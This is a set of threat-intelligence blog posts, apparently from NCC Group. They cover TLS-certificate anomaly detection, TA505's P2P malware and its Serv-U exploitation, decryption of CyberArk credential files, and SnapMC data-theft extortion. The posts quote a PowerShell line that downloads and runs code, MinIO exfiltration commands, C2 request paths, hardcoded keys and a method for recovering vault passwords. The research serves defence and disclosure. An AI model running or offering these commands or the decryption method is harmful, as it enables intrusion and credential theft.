Moreover, the HST works with two consecutive windows; the reference window and the latest window. The HST learns the mass profile in the reference window and uses it as a reference for new incoming data in the latest window. Without going too deep into the workings of the windows, it is worth mentioning that the reference window is updated every time the latest window is full. Namely, when the latest window is full, it will override the mass profile to the reference window and the latest window is cleared so new data can come in. By updating its windows in this way, the HST is robust for evolving streaming data (xiii). 

The anomaly scores output issued by HSTs falls between 0 and 1. The closer the anomaly score is to 1 the easier it was to isolate the certificate and the more likely that the certificate is anomalous. Testing HSTs on our initial collated data it was satisfied that this was a robust approach to the problem, with the Ryuk ransomware certificate repeatedly identified with an anomaly score of 0.84.

The importance of feedback loops – going from research to production

As a provider of managed cyber security services, we are fortunate to have a number of close customers who were willing to deploy the model in a controlled setting on live network traffic. In conjunction with quick feedback from human analysts on the anomaly scores that were being outputted it was possible to optimize the model to ensure that it produced sensible scoring across a wide range of environments. Having achieved credibility, the model could be more widely deployed. In an example of the economic concept of “network effects” the more environments on which the model was deployed, the more model performance has improved and proved itself adaptable to the unique environment in which it is operating. 

Whilst high anomaly scores do not necessarily indicate malicious behavior, they are a measure of weirdness or novelty. Combining the anomaly scoring obtained from HSTs with other metrics or rules, derived in real-time, it has become possible to classify malicious activity with greater certainty.

Machines can learn to detect suspicious TLS certificates 

An unsupervised, incremental anomaly detection model is applied in our security operations centers and now part of our commercial offerings. We would like to encourage other cyber security defenders to look at the characteristics of TLS certificates to detect malicious activities even when traffic is encrypted. Encryption does not equal invisibility and there is often (meta)data to consider. Accordingly so, it requires different approaches to search for malicious activity. Particularly as a Data Science team we found that the Half-Space-Trees is an effective and quick anomaly detector in streaming network data. 

References 

[i] NCC Group & Fox-IT. (2021). “Incremental Machine Learning by Example: Detecting Suspicious Activity with Zeek Data Streams, River, and JA3 Hashes.”
https://research.nccgroup.com/2021/06/14/incremental-machine-leaning-by-example-detecting-suspicious-activity-with-zeek-data-streams-river-and-ja3-hashes/

[ii] Van Luijk, R. (2020) “Hunting for beacons.” Fox-IT.

[iii] Van Luijk, R., Postma, A. (2019). “Using Anomaly Detecting to Find Malicious Domains” Fox-It < https://blog.fox-it.com/2019/06/11/using-anomaly-detection-to-find-malicious-domains/ >

[iv] https://protonmail.com/blog/tls-ssl-certificate/

[v] https://attack.mitre.org/techniques/T1608/003/

[vi] Mokbel, M. (2021). “The State of SSL/TLS Certificate Usage in Malware C&C Communications.” Trend Micro.
https://www.trendmicro.com/en_us/research/21/i/analyzing-ssl-tls-certificates-used-by-malware.html

[vii] https://sslbl.abuse.ch/statistics/

[viii] Cooper, D., Santesson, S., Farrell, S., Boeyen, S., Housley, R., and W. Polk. (2008). “Internet X.509 Public Key Infrastructure Certificate and Certificate Revocation List (CRL) Profile”, RFC 5280, DOI 10.17487/RFC5280.
https://datatracker.ietf.org/doc/html/rfc5280

[ix] https://attack.mitre.org/software/S0446/

[x] Goody, K., Kennelly, J., Shilko, J. Elovitz, S., Bienstock, D. (2020). “Kegtap and SingleMalt with Ransomware Chaser.” FireEye.
https://www.fireeye.com/blog/jp-threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html

[xi] Liu, F. T. , Ting, K. M. & Zhou, Z. (2008). “Isolation Forest”. Eighth IEEE International Conference on Data Mining, pp. 413-422, doi: 10.1109/ICDM.2008.17.
https://ieeexplore.ieee.org/document/4781136

[xii] Togbe, M.U., Chabchoub, Y., Boly, A., Barry, M., Chiky, R., & Bahri, M. (2021). “Anomalies Detection Using Isolation in Concept-Drifting Data Streams.” Comput., 10, 13.
https://www.mdpi.com/2073-431X/10/1/13

[xiii] Tan, S. Ting, K. & Liu, F. (2011). “Fast Anomaly Detection for Streaming Data.” 1511-1516. 10.5591/978-1-57735-516-8/IJCAI11-254.
https://www.ijcai.org/Proceedings/11/Papers/254.pdf

Tracking a P2P network related to TA505

This post is by Nikolaos Pantazopoulos and Michael Sandee

tl;dr – Executive Summary

For the past few months NCC Group has been closely tracking the operations of TA505 and the development of their various projects (e.g. Clop). During this research we encountered a number of binary files that we have attributed to the developer(s) of ‘Grace’ (i.e. FlawedGrace). These included a remote administration tool (RAT) used exclusively by TA505. The identified binary files are capable of communicating with each other through a peer-to-peer (P2P) network via UDP. While there does not appear to be a direct interaction between the identified samples and a host infected by ‘Grace’, we believe with medium to high confidence that there is a connection to the developer(s) of ‘Grace’ and the identified binaries.

In summary, we found the following:

  • P2P binary files, which are downloaded along with other Necurs components (signed drivers, block lists)
  • P2P binary files, which transfer certain information (records) between nodes
  • Based on the network IDs of the identified samples, there seem to be at least three different networks running
  • The programming style and dropped file formats match the development standards of ‘Grace’

History of TA505’s Shift to Ransomware Operations

2014: Emergence as a group

The threat actor, often referred to as TA505 publicly, has been distinguished as an independent threat actor by NCC Group since 2014. Internally we used the name “Dridex RAT group”. Initially it was a group that integrated quite closely with EvilCorp, utilising their Dridex banking malware platform to execute relatively advanced attacks, using often custom made tools for a single purpose and repurposing commonly available tools such as ‘Ammyy Admin’ and ‘RMS’/’RUT’ to complement their arsenal. The attacks performed mostly consisted of compromising organisations and social engineering victims to execute high value bank transfers to corporate mule accounts. These operations included social engineering correctly implemented two-factor authentication with dual authorization by both the creator of a transaction and the authorizee.

2017: Evolution

Late 2017, EvilCorp and TA505 (Dridex RAT Group) split as a partnership. Our hypothesis is that EvilCorp had started to use the Bitpaymer ransomware to extort organisations rather than doing banking fraud. This built on the fact they had already been using the Locky ransomware previously and was attracting unwanted attention. EvilCorp’s ability to execute enterprise ransomware across large-scale businesses was first demonstrated in May 2017. Their capability and success at pulling off such attacks stemmed from the numerous years of experience in compromising corporate networks for banking fraud activity, specifically moving laterally to separate hosts controlled by employees who had the required access and control of corporate bank accounts. The same techniques in relation to lateral movement and tools (such as Empire, Armitage, Cobalt Strike and Metasploit) enabled EvilCorp to become highly effective in targeted ransomware attacks.

However in 2017 TA505 went on their own path and specifically in 2018 executed a large number of attacks using the tool called ‘Grace’, also known publicly as ‘FlawedGrace’ and ‘GraceWire’. The victims were mostly financial institutions and a large number of the victims were located in Africa, South Asia, and South East Asia with confirmed fraudulent wire transactions and card data theft originating from victims of TA505. The tool ‘Grace’ had some interesting features, and showed some indications that it was originally designed as banking malware which had latterly been repurposed. However, the tool was developed and was used in hundreds of victims worldwide, while remaining relatively unknown to the wider public in its first years of use.

2019: Clop and wider tooling

In early 2019, TA505 started to utilise the Clop ransomware, alongside other tools such as ‘SDBBot’ and ‘ServHelper’, while continuing to use ‘Grace’ up to and including 2021. Today it appears that the group has realised the potential of ransomware operations as a viable business model and the relative ease with which they can extort large sums of money from victims.

The remainder of this post dives deeper into a tool discovered by NCC Group that we believe is related to TA505 and the developer of ‘Grace’. We assess that the identified tool is part of a bigger network, possibly related with Grace infections.

Technical Analysis

The technical analysis we provide below focuses on three components of the execution chain:

  1. A downloader – Runs as a service (each identified variant has a different name) and downloads the rest of the components along with a target processes/services list that the driver uses while filtering information. Necurs have used similar downloaders in the past.
  2. A signed driver (both x86 and x64 available) – Filters processes/services in order to avoid detection and/or prevent removal. In addition, it injects the payload into a new process.
  3. Node tool – Communicates with other nodes in order to transfer victim’s data.

It should be noted that for all above components, different variations were identified. However, the core functionality and purposes remain the same.

Upon execution, the downloader generates a GUID (used as a bot ID) and stores it in the ProgramData folder under the filename regid.1991-06.com.microsoft.dat. Any downloaded file is stored temporarily in this directory. In addition, the downloader reads the version of crypt32.dll in order to determine the version of the operating system.

Next, it contacts the command and control server and downloads the following files:

  • t.dat – Expected to contain the string ‘kwREgu73245Nwg7842h’
  • p3.dat – P2P Binary. Saved as ‘payload.dll’
  • d1c.dat – x86 (signed) Driver
  • d2c.dat – x64 (signed) Driver
  • bn.dat – List of processes for the driver to filter. Stored as ‘blacknames.txt’
  • bs.dat – List of services’ name for the driver to filter. Stored as ‘blacksigns.txt’
  • bv.dat – List of files’ version names for the driver to filter. Stored as ‘blackvers.txt’.
  • r.dat – List of registry keys for the driver to filter. Stored as ‘registry.txt’

The network communication of the downloader is simple. Firstly, it sends a GET request to the command and control server, downloads and saves on disk the appropriate component. Then, it reads the component from disk and decrypts it (using the RC4 algorithm) with the hardcoded key ‘ABCDF343fderfds21’. After decrypting it, the downloader deletes the file.

Depending on the component type, the downloader stores each of them differently. Any configurations (e.g. list of processes to filter) are stored in registry under the key HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID with the value name being the thread ID of the downloader. The data are stored in plaintext with a unique ID value at the start (e.g. 0x20 for the processes list), which is used later by the driver as a communication method.

In addition, in one variant, we detected a reporting mechanism to the command and control server for each step taken. This involves sending a GET request, which includes the generated bot ID along with a status code. The below table summarises each identified request (Table 1).

Request Description
/c/p1/dnsc.php?n=%s&in=%s First parameter is the bot ID and the second is the formatted string (“Version_is_%d.%d_(%d)_%d__ARCH_%d”), which contains operating system info
/c/p1/dnsc.php?n=%s&sz=DS_%d First parameter is the bot ID and the second is the downloaded driver’s size
/c/p1/dnsc.php?n=%s&er=ERR_%d First parameter is the bot ID and the second is the error code
/c/p1/dnsc.php?n=%s&c1=1 The first parameter is the bot ID. Notifies the server that the driver was installed successfully
/c/p1/dnsc.php?n=%s&c1=1&er=REB_ERR_%d First parameter is the bot ID and the second is the error code obtained while attempting to shut down the host after finding Windows Defender running
/c/p1/dnsc.php?n=%s&sz=ErrList_%d_% First parameter is the bot ID, second parameter is the resulted error code while retrieving the blocklist processes. The third parameter is set to 1. The same command is also issued after downloading the blacklisted services’ names and versions. The only difference is on the third parameter, which is increased to ‘2’ for blacklisted services, ‘3’ for versions and ‘4’ for blacklisted registry keys
/c/p1/dnsc.php?n=%s&er=PING_ERR_%d First parameter is the bot ID and the second parameter is the error code obtained during the driver download process
/c/p1/dnsc.php?n=%s&c1=1&c2=1 First parameter is the bot ID. Informs the server that the bot is about to start the downloading process.
/c/p1/dnsc.php?n=%s&c1=1&c2=1&c3=1 First parameter is the bot ID. Notified the server that the payload (node tool) was downloaded and stored successfully
Table 1 – Reporting to C2 requests

Driver Analysis

The downloaded driver is the same one that Necurs uses. It has been analysed publically already [1] but in summary, it does the following.

In the first stage, the driver decrypts shellcode, copies it to a new allocated pool and then executes the payload. Next, the shellcode decrypts and runs (in memory) another driver (stored encrypted in the original file). The decryption algorithm remains the same in both cases:

xor_key =  extracted_xor_key
bits = 15
result = b''
for i in range(0,payload_size,4):
	data = encrypted[i:i+4]
	value = int.from_bytes (data, 'little' )^ xor_key
	result += ( _rol(value, bits, 32)  ^ xor_key).to_bytes(4,'little')

Eventually, the decrypted driver injects the payload (the P2P binary) into a new process (‘wmiprvse.exe’) and proceeds with the filtering of data.

A notable piece of code of the driver is the strings’ decryption routine, which is also present in recent GraceRAT samples, including the same XOR key (1220A51676E779BD877CBECAC4B9B8696D1A93F32B743A3E6790E40D745693DE58B1DD17F65988BEFE1D6C62D5416B25BB78EF0622B5F8214C6B34E807BAF9AA).

Payload Attribution and Analysis

The identified sample is written in C++ and interacts with other nodes in the network using UDP. We believe that the downloaded binary file is related with TA505 for (at least) the following reasons:

  1. Same serialisation library
  2. Same programming style with ‘Grace’ samples
  3. Similar naming convention in the configuration’s keys with ‘Grace’ samples
  4. Same output files (dsx), which we have seen in previous TA505 compromises. DSX files have been used by ‘Grace’ operators to store information related with compromised machines.

Initialisation Phase

In the initialisation phase, the sample ensures that the configurations have been loaded and the appropriate folders are created.

All identified samples store their configurations in a resource with name XC.

ANALYST NOTE: Due to limit visibility of other nodes, we were not able to identify the purpose of each key of the configurations.

The first configuration stores the following settings:

  • cx – Parent name
  • nid – Node ID. This is used as a network identification method during network communication. If the incoming network packet does not have the same ID then the packet is treated as a packet from a different network and is ignored.
  • dgx – Unknown
  • exe – Binary mode flag (DLL/EXE)
  • key – RSA key to use for verifying a record
  • port – UDP port to listen
  • va – Parent name. It includes the node IPs to contact.

The second configuration contains the following settings (or metadata as the developer names them):

  • meta – Parent name
  • app – Unknown. Probably specifies the variant type of the server. The following seem to be supported:
    • target (this is the current set value)
    • gate
    • drop
    • control
  • mod – Specifies if current binary is the core module.
  • bld – Unknown
  • api – Unknown
  • llr – Unknown
  • llt- Unknown

Next, the sample creates a set of folders and files in a directory named ‘target’. These folders are:

  • node (folder) – Stores records of other nodes
  • trash (folder) – Move files for deletion
  • units (folder) – Unknown. Appears to contain PE files, which the core module loads.
  • sessions (folder) – Active nodes’ sessions
  • units.dsx (file) – List of ‘units’ to load
  • probes.dsx (file) – Stores the connected nodes IPs along with other metadata (e.g. connection timestamp, port number)
  • net.dsx (file) – Node peer name
  • reports.dsx (file) – Used in recent versions only. Unknown purpose.

Network communication

After the initialisation phase has been completed, the sample starts sending UDP requests to a list of IPs in order to register itself into the network and then exchange information.

Every network packet has a header, which has the below structure:

struct Node_Network_Packet_Header
{
 BYTE XOR_Key;
 BYTE Version; // set to 0x37 ('7')
 BYTE Encrypted_node_ID[16]; // XORed with XOR_Key above
 BYTE Peer_Name[16]; // Xored with XOR_Key above. Connected peer name
 BYTE Command_ID; //Internally called frame type
 DWORD Watermark; //XORed with XOR_Key above
 DWORD Crc32_Data; //CRC32 of above data
};

When the sample requires adding additional information in a network packet, it uses the below structure:

struct Node_Network_Packet_Payload
{
 DWORD Size;
 DWORD CRC32_Data;
 BYTE Data[Size]; // Xored with same key used in the header packet (XOR_Key)
};

As expected, each network command (Table 2) adds a different set of information in the ‘Data’ field of the above structure but most of the commands follow a similar format. For example, an ‘invitation’ request (Command ID 1) has the structure:

struct Node_Network_Invitation_Packet 
{
 BYTE CMD_ID;
 DWORD Session_Label;
 BYTE Invitation_ID[16];
 BYTE Node_Peer_Name[16];
 WORD Node_Binded_Port;
};

The sample supports a limited set of commands, which have as a primary role to exchange ‘records’ between each other.

Command ID Description
1 Requests to register in the other nodes (‘invitation’ request)
2 Adds node IP to the probes list
3 Sends a ping request. It includes number of active connections and records
4 Sends number of active connections and records in the node
5 Adds a new node IP:Port that the remote node will check
6 Sends a record ID along with the number of data blocks
7 Requests metadata of a record
8 Sends metadata of a record
9 Requests the data of a record
10 Receives data of a record and store them on disk
Table 2 – Set of command IDs

ANALYST NOTE: When information, such as record IDs or number of active connections/records, is sent, the binary adds the length of the data followed by the actual data. For example, in case of sending number of active connections and records:

01 05 01 02 01 02

The above is translated as:

2 active connections from a total of 5 with 2 records.

Moreover, when a node receives a request, it sends an echo reply (includes the same packet header) to acknowledge that the request was read. In general, the following types are supported:

  • Request type of 0x10 for echo request.
  • Request type of 0x07 when sending data, which fit in one packet.
  • Request type of 0xD when sending data in multiple packets (size of payload over 1419 bytes).
  • Request type 0x21. It exists in the binary but not supported during the network communications.

Record files

As mentioned already, a record has its own sub-folder under the ‘node’ folder with each sub-folder containing the below files:

  • m – Metadata of record file
  • l – Unknown purpose
  • p – Payload data

The metadata file contains a set of information for the record such as the node peer name and the node network ID. Among this information, the keys ‘tag’ and ‘pwd’ appear to be very important too. The ‘tag’ key represents a command (different from table 2 set) that the node will execute once it receives the record. Currently, the binary only supports the command ‘updates’. The payload file (p) keeps the updated content encrypted with the value of key ‘pwd’ being the AES key.

Even though we have not been able yet to capture any network traffic for the above command, we believe that it is used to update the current running core module.

IoCs

Nodes’ IPs

45.142.213[.]139:555

195.123.246[.]14:555

45.129.137[.]237:33964

78.128.112[.]139:33964

145.239.85[.]6:3333

Binaries

SHA-1 Description
A21D19EB9A90C6B579BCE8017769F6F58F9DADB1   P2P Binary
2F60DE5091AB3A0CE5C8F1A27526EFBA2AD9A5A7 P2P Binary
2D694840C0159387482DC9D7E59217CF1E365027 P2P Binary
02FFD81484BB92B5689A39ABD2A34D833D655266 x86 Driver
B4A9ABCAAADD80F0584C79939E79F07CBDD49657 x64 Driver
00B5EBE5E747A842DEC9B3F14F4751452628F1FE X64 Driver
22F8704B74CE493C01E61EF31A9E177185852437 Downloader
D1B36C9631BCB391BC97A507A92BCE90F687440A Downloader
Table 3 – Binary hashes

TA505 exploits SolarWinds Serv-U vulnerability (CVE-2021-35211) for initial access

NCC Group’s global Cyber Incident Response Team have observed an increase in Clop ransomware victims in the past weeks. The surge can be traced back to a vulnerability in SolarWinds Serv-U that is being abused by the TA505 threat actor. TA505 is a known cybercrime threat actor, who is known for extortion attacks using the Clop ransomware. We believe exploiting such vulnerabilities is a recent initial access technique for TA505, deviating from the actor’s usual phishing-based approach.

NCC Group strongly advises updating systems running SolarWinds Serv-U software to the most recent version (at minimum version 15.2.3 HF2) and checking whether exploitation has happened as detailed below.

We are sharing this information as a call to action for organisations using SolarWinds Serv-U software and incident responders currently dealing with Clop ransomware.

Modus Operandi

Initial Access

During multiple incident response investigations, NCC Group found that a vulnerable version of SolarWinds Serv-U server appeared to be the initial access used by TA505 to breach its victims’ IT infrastructure. The vulnerability being exploited is known as CVE-2021-35211 [1].

SolarWinds published a security advisory [2] detailing the vulnerability in the Serv-U software on July 9, 2021. The advisory mentions that Serv-U Managed File Transfer and Serv-U Secure FTP are affected by the vulnerability. On July 13, 2021, Microsoft published an article [3] on CVE-2021-35211 being abused by a Chinese threat actor referred to as DEV-0322. Here we describe how TA505, a completely different threat actor, is exploiting that vulnerability.

Successful exploitation of the vulnerability, as described by Microsoft [3], causes Serv-U to spawn a subprocess controlled by the adversary. That enables the adversary to run commands and deploy tools for further penetration into the victim’s network. Exploitation also causes Serv-U to log an exception, as described in the mitigations section below

Execution

We observed that Base64 encoded PowerShell commands were executed shortly after the Serv-U exceptions indicating exploitation were logged. The PowerShell commands ultimately led to deployment of Cobalt Strike Beacons on the system running the vulnerable Serv-U software. The PowerShell command observed deploying Cobalt Strike can be seen below: powershell.exe -nop -w hidden -c IEX ((new-object net.webclient).downloadstring(‘hxxp://IP:PORT/a’))

Persistence

On several occasions the threat actor tried to maintain its foothold by hijacking a scheduled tasks named RegIdleBackup and abusing the COM handler associated with it to execute malicious code, leading to FlawedGrace RAT.

The RegIdleBackup task is a legitimate task that is stored in \Microsoft\Windows\Registry. The task is normally used to regularly backup the registry hives. By default, the CLSID in the COM handler is set to: {CA767AA8-9157-4604-B64B-40747123D5F2}. In all cases where we observed the threat actor abusing the task for persistence, the COM handler was altered to a different CLSID.

CLSID objects are stored in registry in HKLM\SOFTWARE\Classes\CLSID\. In our investigations the task included a suspicious CLSID, which subsequently redirected to another CLSID. The second CLSID included three objects containing the FlawedGrace RAT loader. The objects contain Base64 encoded strings that ultimately lead to the executable.

Checks for potential compromise

Check for exploitation of Serv-U

NCC Group recommends looking for potentially vulnerable Serv-U FTP-servers in your network and check these logs for traces of similar exceptions as suggested by the SolarWinds security advisory. It is important to note that the publications by Microsoft and SolarWinds are describing follow-up activity regarding a completely different threat actor than we observed in our investigations.

Microsoft’s article [3] on CVE-2021-35211 provides guidance on the detection of the abuse of the vulnerability. The first indicator of compromise for the exploitation of this vulnerability are suspicious entries in a Serv-U log file named DebugSocketlog.txt. This log file is usually located in the Serv-U installation folder. Looking at this log file it contains exceptions at the time of exploitation of CVE-2021-35211. NCC Group’s analysts encountered the following exceptions during their investigations:

EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();

However, as mentioned in Microsoft’s article, this exception is not by definition an indicator of successful exploitation and therefore further analysis should be carried out to determine potential compromise.

Check for suspicious PowerShell commands

Analysts should look for suspicious PowerShell commands being executed close to the date and time of the exceptions. The full content of PowerShell commands is usually recorded in Event ID 4104 in the Windows Event logs.

Check for RegIdleBackup task abuse

Analysts should look for the RegIdleBackup task with an altered CLSID. Subsequently, the suspicious CLSID should be used to query the registry and check for objects containing Base64 encoded strings. The following PowerShell commands assist in checking for the existence of the hijacked task and suspicious CLSID content.

Check for altered RegIdleBackup task

Export-ScheduledTask -TaskName “RegIdleBackup” -TaskPath “\Microsoft\Windows\Registry\” | Select-String -NotMatch “<ClassId>{CA767AA8-9157-4604-B64B-40747123D5F2}</ClassId>”

Check for suspicious CLSID registry key content

Get-ChildItem -Path ‘HKLM:\SOFTWARE\Classes\CLSID\{SUSPICIOUS_CLSID}

Summary of checks

The following steps should be taken to check whether exploitation led to a suspected compromise by TA505:

  • Check if your Serv-U version is vulnerable
  • Locate the Serv-U’s DebugSocketlog.txt
  • Search for entries such as ‘EXCEPTION: C0000005; CSUSSHSocket::ProcessReceive();’ in this log file
  • Check for Event ID 4104 in the Windows Event logs surrounding the date/time of the exception and look for suspicious PowerShell commands
  • Check for the presence of a hijacked Scheduled Task named RegIdleBackup using the provided PowerShell command
    • In case of abuse: the CLSID in the COM handler should NOT be set to {CA767AA8-9157-4604-B64B-40747123D5F2}
  • If the task includes a different CLSID: check the content of the CLSID objects in the registry using the provided PowerShell command, returned Base64 encoded strings can be an indicator of compromise.

Vulnerability Landscape

There are currently still many vulnerable internet-accessible Serv-U servers online around the world.

In July 2021 after Microsoft published about the exploitation of Serv-U FTP servers by DEV-0322, NCC Group mapped the internet for vulnerable servers to gauge the potential impact of this vulnerability. In July, 5945 (~94%) of all Serv-U (S)FTP services identified on port 22 were potentially vulnerable. In October, three months after SolarWinds released their patch, the number of potentially vulnerable servers is still significant at 2784 (66.5%).

The top countries with potentially vulnerable Serv-U FTP services at the time of writing are:

Amount  Country 
1141  China 
549  United States 
99  Canada 
92  Russia 
88  Hong Kong 
81  Germany 
65  Austria 
61  France 
57  Italy 
50  Taiwan 
36  Sweden 
31  Spain 
30  Vietnam 
29  Netherlands 
28  South Korea 
27  United Kingdom 
26  India 
21  Ukraine 
18  Brazil 
17  Denmark 

Top vulnerable versions identified: 

Amount  Version 
441  SSH-2.0-Serv-U_15.1.6.25 
236  SSH-2.0-Serv-U_15.0.0.0 
222  SSH-2.0-Serv-U_15.0.1.20 
179  SSH-2.0-Serv-U_15.1.5.10 
175  SSH-2.0-Serv-U_14.0.1.0 
143  SSH-2.0-Serv-U_15.1.3.3 
138  SSH-2.0-Serv-U_15.1.7.162 
102  SSH-2.0-Serv-U_15.1.1.108 
88  SSH-2.0-Serv-U_15.1.0.480 
85  SSH-2.0-Serv-U_15.1.2.189 

MITRE ATT&CK mapping

Tactic  Technique  Procedure 
Initial Access  T1190 – Exploit Public Facing Application(s)  TA505 exploited CVE-2021-35211 to gain remote code execution. 
Execution  T1059.001 – Command and Scripting Interpreter: PowerShell  TA505 used Base64 encoded PowerShell commands to download and run Cobalt Strike Beacons on target systems. 
Persistence  T1053.005 – Scheduled Task/Job: Scheduled Task  TA505 hijacked a scheduled task named RegIdleBackup and abused the COM handler associated with it to execute malicious code and gain persistence. 
Defense Evasion  T1112 – Modify Registry  TA505 altered the registry so that the RegIdleBackup scheduled task executed the FlawedGrace RAT loader, which was stored as Base64 encoded strings in the registry. 

References 

[1] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35211 

[2] https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211 

[3] https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/ 

Reverse engineering and decrypting CyberArk vault credential files

Author: Jelle Vergeer

This blog will be a technical deep-dive into CyberArk credential files and how the credentials stored in these files are encrypted and decrypted. I discovered it was possible to reverse engineer the encryption and key generation algorithms and decrypt the encrypted vault password. I also provide a python implementation to decrypt the contents of the files.

Introduction

It was a bit more than a year ago that we did a penetration test for a customer where we came across CyberArk. During the penetration test we tested the implementation of their AD tiering model and they used CyberArk to implement this. During the penetration test we were able to get access to the CyberArk Privileged Session Manager (PSM) server. We found several .cred CyberArk related files on this server. At the time of the assignment I suspected the files were related to accessing the CyberArk Vault. This component stores all passwords used by CyberArk. The software seemed to be able to access the vault using the files with no additional user input necessary. These credential files contain several fields, including an encrypted password and an “AdditionalInformation” field. I immediately suspected I could reverse or break the crypto to recover the password, though the binaries were quite large and complex (C++ classes everywhere).

A few months later during another assignment for another customer we again found CyberArk related credential files, but again, nobody knew how to decrypt them. So during a boring COVID stay-at-home holiday I dove into the CreateCredFile.exe binary, used to create new credential files, and started reverse engineering the logic. Creating a dummy credential file using the CreateCredFile utility looks like to following:

Creating a new credential file with CreateCredFile.exe
The created test.cred credential file

The encryption and key generation algorithms

It appears there are several types of credential files (Password, Token, PKI, Proxy and KeyPair). For this exercise we will look at the password type. The details in the file can be encrypted using several algorithms:

  • DPAPI protected machine storage
  • DPAPI protected user storage
  • Custom

The default seemed to be the custom one, and after some effort I started to understand the logic how the software encrypts and decrypts the password in the file. The encryption algorithm is roughly the following:

First the software generates 20 random bytes and converts this to a hexadecimal string. This string is stored in the internal CCAGCredFile object for later use. This basically is the “AdditionalInformation” field in the credential files. When the software actually enters the routine to encrypt the password, it will generate a string that will be used to generate the final AES key. I will refer to this string as the base key. This string will consist of the following parts, appended together:

  • The Application Type restriction, converted to lower case, hashed with SHA1 and base64 encoded.
  • The Executable Path restriction, converted to lower case.
  • The Machine IP restriction.
  • The Machine Hostname restriction, converted to lower case.
  • The OS Username restriction, converted to lower case.
  • The 20 random bytes, or AdditionalInformation field.
An example base string that will be used to generate the AES key

Note that by default, the software will not apply the additional restrictions, only relying on the additional info field, present in the credential files. After the base key is generated, the software will generate the actual encryption key used for encrypting and decrypting credentials in the credential files. It will start by creating a SHA1 context, and update the context with the base key. Next it will create two copies of the context. The first context is updated with the integer ‘1’, and the second is updated with the integer ‘2’, both in big endian format. The finalized digest of the first context serves as the first part of the key, appended by the first 12 bytes of the finalized second digest. The AES key is thus 32 bytes long.

When encrypting a value, the software generates some random bytes to use as initialization vector (IV) , and stores the IV in the first block of encrypted bytes. Furthermore, when a value is encrypted, the software will encrypt the value itself, combined with the hash of the value. I assume this is done to verify the decryption routine was successful and the data is not corrupted.

Decrypting credential files

Because, by default, the software will only rely on the random bytes as base key, which are included in the credential file, we can generate the correct AES key to decrypt the encrypted contents in the file. I implemented a Python utility to decrypt CyberArk Credential files and it can be downloaded here. The additional verification attributes the software can use to include in the base key can be provided as command line arguments to the decryption tool. Most of these can be either guessed, or easily discovered, as an attacker will most likely already have a foothold in the network, so a hostname or IP address is easily uncovered. In some cases the software even stores these verification attributes in the file as it asks to include the restrictions in the credential file when creating one using the CreateCredFile.exe utility.

Decrypting a credential file using the decryption tool.

Defense

How to defend against attackers from decrypting the CyberArk vault password in these credential files? First off, prevent an attacker from gaining access to the credential files in the first place. Protect your credential files and don’t leave them accessible by users or systems that don’t need access to them. Second, when creating credential files using the CreateCredFile utility, prefer the “Use Operating System Protected Storage for credentials file secret” option to protect the credentials with an additional (DPAPI) encryption layer. If this encryption is applied, an attacker will need access to the system on which the credential file was generated in order to decrypt the credential file.

Responsible Disclosure

We reported this issue at CyberArk and they released a new version mitigating the decryption of the credential file by changing the crypto implementation and making the DPAPI option the default. We did not have access to the new version to verify these changes.

Timeline:

20-06-2021 – Reported issue at CyberArk.
21/23/27/28-06-2021 – Communication back and forth with questions and explanation.
29-06-2021 – Call with CyberArk. They released a new version which should mitigate the issue.

SnapMC skips ransomware, steals data

Over the past few months NCC Group has observed an increasing number of data breach extortion cases, where the attacker steals data and threatens to publish said data online if the victim decides not to pay. Given the current threat landscape, most notable is the absence of ransomware or any technical attempt at disrupting the victim’s operations.

Within the data breach extortion investigations, we have identified a cluster of activities defining a relatively constant modus operandi described in this article. We track this adversary as SnapMC and have not yet been able to link it to any known threat actors. The name SnapMC is derived from the actor’s rapid attacks, generally completed in under 30 minutes, and the exfiltration tool mc.exe it uses.

Extortion emails threatening their recipients have become a trend over time. The lion’s share of these consists of empty threats sent by perpetrators hoping to profit easily without investing in an actual attack. In the extortion emails we have seen from SnapMC have given victims 24 hours to get in contact and 72 hours to negotiate. These deadlines are rarely abided by since we have seen the attacker to start increasing the pressure well before countdown hits zero. SnapMC includes a list of the stolen data as evidence that they have had access to the victim’s infrastructure. If the organization does not respond or negotiate within the given timeframe, the actor threatens to (or immediately does) publish the stolen data and informs the victim’s customers and various media outlets.

Modus Operandi

Initial Access

At the time of writing NCC Group’s Security Operations Centers (SOCs) have seen SnapMC scanning for multiple vulnerabilities in both webserver applications and VPN solutions. We have observed this actor successfully exploiting and stealing data from servers that were vulnerable to:

  • Remote code execution in Telerik UI for ASPX.NET [1]
  • SQL injections

After successfully exploiting a webserver application, the actor executes a payload to gain remote access through a reverse shell. Based on the observed payloads and characteristics the actor appears to use a publicly available Proof-of-Concept Telerik Exploit [2].

Directly afterwards PowerShell is started to perform some standard reconnaissance activity:

  • whoami
  • whoami /priv
  • wmic logicaldisk get caption,description,providername
  • net users /priv

Note: that in the last command the adversary used the ‘/priv’ option, which is not a valid option for the net users command.

Privilege Escalation

In most of the cases we analyzed the threat actor did not perform privilege escalation. However in one case we did observe SnapMC trying to escalate privileges by running a handful of PowerShell scripts:

  • Invoke-Nightmare [3]
  • Invoke-JuicyPotato [4]
  • Invoke-ServiceAbuse [4]
  • Invoke-EventVwrBypass [6]
  • Invoke-PrivescAudit [7]

Collection & Exfiltration

We observed the actor preparing for exfiltration by retrieving various tools to support data collection, such as 7zip and Invoke-SQLcmd scripts. Those, and artifacts related to the execution or usage of these tools, were stored in the following folders:

  • C:\Windows\Temp\
  • C:\Windows\Temp\Azure
  • C:\Windows\Temp\Vmware

SnapMC used the Invoke-SQLcmd PowerShell script to communicate with the SQL database and export data. The actor stored the exported data locally in CSV files and compressed those files with the 7zip archive utility.

The actor used the MinIO [8] client to exfiltrate the data. Using the PowerShell commandline, the actor configured the exfil location and key to use, which were stored in a config.json file. During the exfiltration, MinIO creates a temporary file in the working directory with the file extension […].par.minio.

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure alias set <DIR> <EXFIL_LOCATION> <API key> <API SECRET> 

C:\Windows\Temp\mc.exe --config-dir C:\Windows\Temp\vmware\.x --insecure cp --recursive [DIR NAME] <CONFIGURED DIRECTORY>/<REMOTE DIRECTORY>/<VICTIM DIRECTORY>

Mitigations

